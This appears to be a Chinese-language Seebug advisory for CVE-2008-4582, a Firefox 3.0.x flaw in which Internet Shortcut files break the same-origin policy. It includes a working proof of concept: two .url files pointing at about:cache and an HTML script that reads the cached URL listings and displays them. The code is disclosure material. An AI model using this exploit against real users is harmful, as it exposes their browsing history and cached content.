Lucene search
RootSSV:4453HistoryNov 17, 2008 - 12:00 a.m.
Mozilla Firefox Internet快捷方式破坏同源策略漏洞
2008-11-1700:00:00
Root
www.seebug.org
26
EPSS
0.004
Percentile
74.4%
BUGTRAQ ID: 31611,31747
CVE(CAN) ID: CVE-2008-4582
Firefox是非常流行的开源WEB浏览器。
Firefox在通过HTML单元启动URL快捷方式的时候没有正确地实施同源策略,如果在本地路径或Windows共享(UNC/SMB)路径中打开了网页的话,就可能读取任何位置的内容,包括缓存信息、Cookie、本地文件系统等。
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.mozilla.org/” target=“_blank”>http://www.mozilla.org/</a>
-----testurl1.url-----
[InternetShortcut]
URL=about:cache?device=memory
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
-----testurl2.url-----
[InternetShortcut]
URL=about:cache?device=disk
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
-----test.html-----
<script>
function a()
{
s="";
h="";
for(i=0;i<window.frames.length;i++)
{
d=window.frames[i].document;
for(j=0;j<d.links.length;j++)
{
u=d.links[j].text
s+=u+"\n";
h+="<img src=\""+u+"\">";
}
}
document.getElementById("t").value=s;
document.getElementById("x").innerHTML=h;
}
</script>
<a href="javascript:a();">Start Test</a><br>
<a href="javascript:window.location=location.href">Load This Page Again</a><br>
<br>
<br>
<b>List of files that you recently fetched from the internet:</b><br>
<textarea rows="10" cols="100" id=t wrap=off></textarea>
<br>
<br>
<b>List of images that you recently viewed on the internet:</b><br>
<div id=x></div>
<br>
<br>
<iframe width=300 height=200 src="testurl1.url"></iframe>
<iframe width=300 height=200 src="testurl2.url"></iframe>
Related
openvas
openvas
Firefox .url Shortcut File Information Disclosure Vulnerability
2008-10-17 00:00:00
Debian Security Advisory DSA 1671-1 (iceweasel)
2008-12-03 00:00:00
Fedora Update for google-gadgets FEDORA-2008-9669
2009-02-17 00:00:00
securityvulns
securityvulns
Mozilla Foundation Security Advisory 2008-47
2008-11-14 00:00:00
Mozilla Firefox / Thinderbird / Seamonkey multiple security vulnerabilities
2008-11-14 00:00:00
mozilla
mozilla
Information stealing via local shortcut files — Mozilla
2008-11-12 00:00:00
exploitdb
exploitdb
Mozilla Firefox 3.0.3 - Internet Shortcut Same Origin Policy Violation
2008-10-07 00:00:00
ubuntucve
ubuntucve
CVE-2009-0356
2009-02-04 00:00:00
CVE-2008-4582
2008-10-15 00:00:00
cve
cve
CVE-2008-4582
2008-10-15 20:08:02
CVE-2009-0356
2009-02-04 19:30:00
cvelist
cvelist
CVE-2009-0356
2009-02-04 19:00:00
CVE-2008-4582
2008-10-15 20:00:00
prion
prion
Information disclosure
2008-10-15 20:08:00
Design/Logic Flaw
2009-02-04 19:30:00
nvd
nvd
CVE-2009-0356
2009-02-04 19:30:00
CVE-2008-4582
2008-10-15 20:08:02
debian
debian
[SECURITY] [DSA 1671-1] New iceweasel packages fix several vulnerabilities
2008-11-24 21:36:25
[SECURITY] [DSA 1669-1] New xulrunner packages fix several vulnerabilities
2008-11-23 20:29:40
[SECURITY] [DSA 1696-1] New icedove packages fix several vulnerabilities
2009-01-07 21:32:09
nessus
nessus
Firefox 3.0.x < 3.0.4 Multiple Vulnerabilities
2008-11-13 00:00:00
Debian DSA-1671-1 : iceweasel - several vulnerabilities
2008-11-25 00:00:00
osv
osv
iceweasel - several vulnerabilities
2008-11-24 00:00:00
xulrunner - several vulnerabilities
2008-11-23 00:00:00
icedove - several vulnerabilities
2009-01-07 00:00:00
fedora
fedora
[SECURITY] Fedora 9 Update: evolution-rss-0.1.0-4.fc9
2008-11-14 12:52:41
[SECURITY] Fedora 9 Update: google-gadgets-0.10.1-5.fc9.1
2008-11-14 12:52:42
[SECURITY] Fedora 9 Update: epiphany-2.22.2-5.fc9
2008-11-14 12:52:41
freebsd
freebsd
mozilla -- multiple vulnerabilities
2008-11-13 00:00:00
ubuntu
ubuntu
Firefox and xulrunner vulnerabilities
2008-11-17 00:00:00
gentoo
gentoo
Mozilla Products: Multiple vulnerabilities
2013-01-08 00:00:00